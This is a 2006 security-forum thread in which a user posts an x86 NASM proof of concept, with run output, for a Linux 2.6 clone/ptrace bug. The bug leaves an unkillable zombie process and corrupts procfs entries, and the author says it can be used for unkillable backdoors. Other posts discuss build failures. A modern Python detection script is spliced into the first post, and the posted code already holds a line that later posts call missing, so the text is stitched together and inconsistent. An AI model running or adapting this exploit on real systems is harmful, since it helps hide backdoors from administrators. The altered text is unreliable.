Waraxe IT Security Portal
NEW! Unkillable thread + procfs corruption
Posted: Tue Jan 10, 2006 4:28 pm by erg0t (Valuable expert, joined Apr 08, 2005, 55 posts, Uruguay)
This is a new PoC of the old bug I found, now it can run the thread!!!
And in the old bug, the thread could be killed by re-attaching it, now it can't!!!
And one more thing, some of the ProcFS info is corrupted, so you can't see some things such as maps, mem, and tasks.
I'm testing on a 2.6.11; last time, on a 2.6.13, the old version worked.
A friend told me that in 2.6.14 you can kill it :(
Please try it and post your results!
This bug can be used to code unkillable backdoors, forcing the admin to reboot.

Code:

CLONE_VM equ 0x00000100
CLONE_THREAD equ 0x00010000
CLONE_SIGHAND equ 0x00000800
SIGCHLD equ 17

[global main]            ; export main so gcc's crt1.o start code can link against it
[extern printf]

[section .data]
forked db " >> fork: %d",10,0

[section .text]
no_child:                ; fork() parent: report the child pid and exit(0)
push eax
push forked
call printf
xor ebx, ebx
mov eax, 1               ; sys_exit
call 0xffffe400          ; __kernel_vsyscall at its fixed vDSO address on this 2.6 kernel
bad:
[section .data]
..@4.cadena: db " !! Can't create thread",10
[section .text]
mov ebx, 1               ; sys_write(stdout, msg, len)
mov ecx, ..@4.cadena
mov edx, 23+1
mov eax, 4
call 0xffffe400
mov ebx, -1
mov eax, 1               ; sys_exit(-1)
call 0xffffe400
main:
mov eax, 2               ; sys_fork
call 0xffffe400
test eax, eax
jnz no_child             ; non-zero return: we are the parent
[section .data]
..@13.cadena: db " >> Creating thread...",10
[section .text]
mov ebx, 1
mov ecx, ..@13.cadena
mov edx, 22+1
mov eax, 4
call 0xffffe400
mov ebx, CLONE_VM | CLONE_THREAD | CLONE_SIGHAND | SIGCHLD   ; clone flags: a thread sharing VM and signal handlers
xor ecx, ecx             ; child_stack = NULL, the thread keeps using the caller's stack
mov eax, 120             ; sys_clone
call 0xffffe400
test eax, eax
jz child                 ; zero return: we are the new thread
test eax, 0x80000000
jnz bad                  ; negative return: clone failed
xor ebx, ebx
mov eax, 1               ; thread-group leader exits while the thread keeps running
call 0xffffe400
child:
xor ebx, ebx             ; PTRACE_TRACEME
mov eax, 26              ; sys_ptrace
call 0xffffe400
test eax, eax
jnz bad2
[section .data]
..@26.cadena: db " >> Thread attached and running",10
[section .text]
mov ebx, 1
mov ecx, ..@26.cadena
mov edx, 31+1
mov eax, 4
call 0xffffe400
aki: jmp aki             ; spin forever
bad2:
[section .data]
..@32.cadena: db " !! Can't attach",10
[section .text]
mov ebx, 1
mov ecx, ..@32.cadena
mov edx, 16+1
mov eax, 4
call 0xffffe400
mov ebx, -1
mov eax, 1
call 0xffffe400


Code:

erg0t nasm # nasm -felf test.asm ; gcc test.o -o test ; ./test
>> Creating thread...
>> fork: 8407
erg0t nasm # >> Thread attached and running
killall -9 test ; ps -A | grep test
8407 pts/0 00:00:27 test <defunct>
erg0t nasm # ls /proc/8407
auxv cmdline cwd environ exe fd maps mem mounts oom_adj oom_score root stat statm status task
erg0t nasm # cat /proc/8407/*
cat: /proc/8407/cwd: No existe el fichero o el directorio
cat: /proc/8407/exe: No existe el fichero o el directorio
cat: /proc/8407/fd: No existe el fichero o el directorio
cat: /proc/8407/mem: No existe el fichero o el directorio
cat: /proc/8407/mounts: Argumento inválido
0
0
cat: /proc/8407/root: No existe el fichero o el directorio
8407 (test) Z 1 8406 7842 34816 8417 76 1 0 0 0 2764 5 0 0 17 0 2 0 1002050 0 0 4294967295 0 0 0 0 0 256 0 0 0 4294967295 0 0 17 0 0 0
0 0 0 0 0 0 0
Name: test
State: Z (zombie)
SleepAVG: 58%
Tgid: 8407
Pid: 8407
PPid: 1
TracerPid: 0
Uid: 0 0 0 0
Gid: 0 0 0 0
FDSize: 0
Groups: 0 1 2 3 4 6 10 11 20 26 27
Threads: 2
SigPnd: 0000000000000100
ShdPnd: 0000000000000100
SigBlk: 0000000080000000
SigIgn: 0000000000000000
SigCgt: 0000000000000000
CapInh: 0000000000000000
CapPrm: 00000000fffffeff
CapEff: 00000000fffffeff
cat: /proc/8407/task: No existe el fichero o el directorio
erg0t nasm # uname -a
Linux erg0t 2.6.11 #1 Tue Dec 13 19:38:25 GMT 2005 i686 AMD Athlon(tm) XP 2000+ AuthenticAMD GNU/Linux
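One way to detect on a running box the condition the output above shows, as an added example that is not erg0t's code: it parses /proc/<pid>/status records and flags a thread-group leader that is reported as Z (zombie) while Threads is still above 1 and SIGKILL stays pending in SigPnd/ShdPnd because nothing ever dequeues it. The sample records are constructed, modelled on the /proc/8407/status excerpt above; the function names are my own, and scan_proc() applies the same logic to a live procfs.

```python
"""Scan /proc/<pid>/status records for a zombie thread-group leader that
still owns live threads and has an undeliverable SIGKILL pending."""
import os

SIGKILL = 9

# Constructed sample records (pid, status text), modelled on the post's output.
SAMPLE_RECORDS = [
    # a healthy single-threaded process
    (1, "Name:\tinit\nState:\tS (sleeping)\nTgid:\t1\nPid:\t1\nPPid:\t0\n"
        "Threads:\t1\nSigPnd:\t0000000000000000\nShdPnd:\t0000000000000000\n"),
    # an ordinary zombie: one thread, nothing pending, just waiting to be reaped
    (4242, "Name:\tsh\nState:\tZ (zombie)\nTgid:\t4242\nPid:\t4242\nPPid:\t1\n"
           "Threads:\t1\nSigPnd:\t0000000000000000\nShdPnd:\t0000000000000000\n"),
    # the leader from the post: zombie, yet two threads and SIGKILL still pending
    (8407, "Name:\ttest\nState:\tZ (zombie)\nTgid:\t8407\nPid:\t8407\nPPid:\t1\n"
           "Threads:\t2\nSigPnd:\t0000000000000100\nShdPnd:\t0000000000000100\n"
           "SigBlk:\t0000000080000000\n"),
]


def parse_status(text):
    """Parse the 'Key:<tab>value' lines of a status file into a dict."""
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition(":")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def pending_signals(hexmask):
    """Decode a SigPnd/ShdPnd mask: bit n-1 set means signal n is pending."""
    mask = int(hexmask, 16)
    return {n for n in range(1, 65) if mask & (1 << (n - 1))}


def state_code(fields):
    """'Z (zombie)' -> 'Z'; empty string when the field is missing."""
    state = fields.get("State", "")
    return state.split()[0] if state else ""


def classify(fields):
    """Return the list of findings for one parsed status record."""
    findings = []
    state = state_code(fields)
    threads = int(fields.get("Threads", "0") or 0)
    is_leader = fields.get("Pid") == fields.get("Tgid")
    if state == "Z" and is_leader and threads > 1:
        findings.append("zombie leader with live threads")
    pending = (pending_signals(fields.get("SigPnd", "0"))
               | pending_signals(fields.get("ShdPnd", "0")))
    if state == "Z" and SIGKILL in pending:
        findings.append("SIGKILL pending but never delivered")
    return findings


def scan_records(records):
    """records: iterable of (pid, status_text). Returns {pid: findings} for flagged pids."""
    flagged = {}
    for pid, text in records:
        findings = classify(parse_status(text))
        if findings:
            flagged[pid] = findings
    return flagged


def flagged_pids(records):
    """Sorted list of pids that triggered at least one finding."""
    return sorted(scan_records(records))


def scan_proc(proc_root="/proc"):
    """Apply the same checks to a live procfs; pids that vanish mid-scan are skipped."""
    records = []
    for name in os.listdir(proc_root):
        if not name.isdigit():
            continue
        try:
            with open(os.path.join(proc_root, name, "status")) as fh:
                records.append((int(name), fh.read()))
        except OSError:
            continue
    return scan_records(records)


if __name__ == "__main__":
    for pid, findings in scan_records(SAMPLE_RECORDS).items():
        print(pid, "; ".join(findings))
```

On the sample data only pid 8407 is reported, with both findings; the ordinary zombie 4242 is not, because a reaped-any-moment zombie with one thread and no pending SIGKILL is normal. A periodic run of scan_proc() from cron or a monitoring agent turns the page's manual `cat /proc/8407/status` into a repeatable check.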
Posted: Tue Jan 10, 2006 5:33 pm by erg0t (Valuable expert, joined Apr 08, 2005, 55 posts, Uruguay)
Well, I did some more tests, and the thread is terminated, but the structures are still there, so it is really killed :(
I will try to do some more tests to see if I can find a way to keep the thread running.
Posted: Wed Jan 11, 2006 10:41 am by fizzi (Advanced user, joined Sep 14, 2005, 55 posts)
Hi,
I tried to compile your program under amd64 but it didn't work. I have kernel 2.6.15 and I get
Code:
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../x86_64-slackware-linux/bin/ld: warning: i386 architecture of input file `test.o' is incompatible with i386:x86-64 output
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../lib64/crt1.o(.text+0x21): In function `_start':
../sysdeps/x86_64/elf/start.S:109: undefined reference to `main'

Perhaps you can tell me how to get this thing compiled for amd64 or 32-bit arch.
Posted: Wed Jan 11, 2006 2:42 pm by erg0t (Valuable expert, joined Apr 08, 2005, 55 posts, Uruguay)
fizzi wrote:
Hi,
I tried to compile your program under amd64 but it didn't work. I have kernel 2.6.15 and I get
Code:
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../x86_64-slackware-linux/bin/ld: warning: i386 architecture of input file `test.o' is incompatible with i386:x86-64 output
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../lib64/crt1.o(.text+0x21): In function `_start':
../sysdeps/x86_64/elf/start.S:109: undefined reference to `main'

Perhaps you can tell me how to get this thing compiled for amd64 or 32-bit arch.


It's only for x86.
Posted: Wed Jan 11, 2006 3:09 pm by fizzi (Advanced user, joined Sep 14, 2005, 55 posts)
Yeah, but isn't amd64 compatible with 32-bit programs?
So this should also work on my x86_64 architecture, but it just won't compile.
Posted: Thu Jan 12, 2006 1:21 am by shai-tan (Valuable expert, joined Feb 22, 2005, 477 posts)
Hey erg0t, how's everything holding up? Ah, isn't assembly great...

Anywayz:

Code:

shai-tan@Shai-tan:~$ nasm -felf test.asm ; gcc test.o -o test
/usr/lib/gcc/i486-linux-gnu/4.0.2/../../../../lib/crt1.o: In function `_start':
../sysdeps/i386/elf/start.S:115: undefined reference to `main'
collect2: ld returned 1 exit status


This is on 2.6.12

Bloody hell, I wish the kernel team had made a 2.7 development kernel, because at the moment so much crap is streaming into the kernel. I think by version 3.0 a re-write will be needed to keep the Linux kernel up to the likes of the new GNU/Hurd kernel.


Shai-tan

_________________
Shai-tan

"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds
Posted: Thu Jan 12, 2006 3:32 pm by erg0t (Valuable expert, joined Apr 08, 2005, 55 posts, Uruguay)
shai-tan wrote:
Hey erg0t, how's everything holding up? Ah, isn't assembly great...

Anywayz:

Code:

shai-tan@Shai-tan:~$ nasm -felf test.asm ; gcc test.o -o test
/usr/lib/gcc/i486-linux-gnu/4.0.2/../../../../lib/crt1.o: In function `_start':
../sysdeps/i386/elf/start.S:115: undefined reference to `main'
collect2: ld returned 1 exit status


This is on 2.6.12

Bloody hell, I wish the kernel team had made a 2.7 development kernel, because at the moment so much crap is streaming into the kernel. I think by version 3.0 a re-write will be needed to keep the Linux kernel up to the likes of the new GNU/Hurd kernel.


Shai-tan


Hi, I have NASM version 0.98.39 compiled on Dec 15 2005 and
gcc versión 3.3.6 (Gentoo 3.3.6, ssp-3.3.6-1.0, pie-8.7.8)

BTW, I sent a patch for another bug in clone and it was added to the -mm tree.
It's called i386-sys_clone-from-vsyscall.patch
I'm very happy :D
Posted: Thu Jan 12, 2006 5:21 pm by shai-tan (Valuable expert, joined Feb 22, 2005, 477 posts)
Ah, maybe it's gcc 4.0 which is breaking it.

Shai-tan

_________________
Shai-tan

"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds
Posted: Thu Jan 12, 2006 7:29 pm by fizzi (Advanced user, joined Sep 14, 2005, 55 posts)
shai-tan wrote:
Hey erg0t, how's everything holding up? Ah, isn't assembly great...

Anywayz:

Code:

shai-tan@Shai-tan:~$ nasm -felf test.asm ; gcc test.o -o test
/usr/lib/gcc/i486-linux-gnu/4.0.2/../../../../lib/crt1.o: In function `_start':
../sysdeps/i386/elf/start.S:115: undefined reference to `main'
collect2: ld returned 1 exit status


This is on 2.6.12

Bloody hell, I wish the kernel team had made a 2.7 development kernel, because at the moment so much crap is streaming into the kernel. I think by version 3.0 a re-write will be needed to keep the Linux kernel up to the likes of the new GNU/Hurd kernel.


Shai-tan


As I can see, this is the same error message I get when I try to compile this thingy, but I have amd64 and gcc 3.4.4.
"undefined reference to main" ... seems it can't find the main routine. So ... any other linker or compiler I can choose?
Posted: Thu Jan 12, 2006 7:37 pm by fizzi (Advanced user, joined Sep 14, 2005, 55 posts)
Code:
gcc -nostartfiles -o test test.o
/usr/lib/gcc/x86_64-slackware-linux/3.4.4/../../../../x86_64-slackware-linux/bin/ld: warning: i386 architecture of input file `test.o' is incompatible with i386:x86-64 output

OK, I'm getting closer ...
Posted: Thu Jan 12, 2006 7:47 pm by fizzi (Advanced user, joined Sep 14, 2005, 55 posts)
Code:
gcc -nostartfiles -m32 -o test -pipe -march=i386 -mcpu=i686 -fno-strength-reduce -fno-strict-aliasing -pipe test.o
collect2: ld terminated with signal 11 [Segmentation fault]

I give up.
Posted: Thu Jan 12, 2006 8:07 pm by erg0t (Valuable expert, joined Apr 08, 2005, 55 posts, Uruguay)
fizzi wrote:
Code:
gcc -nostartfiles -m32 -o test -pipe -march=i386 -mcpu=i686 -fno-strength-reduce -fno-strict-aliasing -pipe test.o
collect2: ld terminated with signal 11 [Segmentation fault]

I give up.


The problem is that nasm generates code only for x86; maybe you can convert the code to gas.
Posted: Fri Jan 13, 2006 6:05 am by shai-tan (Valuable expert, joined Feb 22, 2005, 477 posts)
Well, I use x86, and why is it not working?

Shai-tan

_________________
Shai-tan

"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds
Posted: Fri Jan 13, 2006 10:02 am by erg0t (Valuable expert, joined Apr 08, 2005, 55 posts, Uruguay)
shai-tan wrote:
Well, I use x86, and why is it not working?

Shai-tan


Sorry, I know what is happening. I use a lot of macros I made for my code, so to get code that everyone could compile I used nasm -e and posted the output, but by mistake I didn't select one line before it containing [global main]. So to get the code working you have to add global main to the top of the code.
Posted: Fri Jan 13, 2006 10:17 am by shai-tan (Valuable expert, joined Feb 22, 2005, 477 posts)
Ah, I see.

Thanks. I'll get round to it later because I'm a bit busy tonight. I'll tell you what happens.


Shai-tan

_________________
Shai-tan

"In short: just say NO TO DRUGS, and maybe you won't end up like the Hurd people." -- Linus Torvalds
Page 1 of 2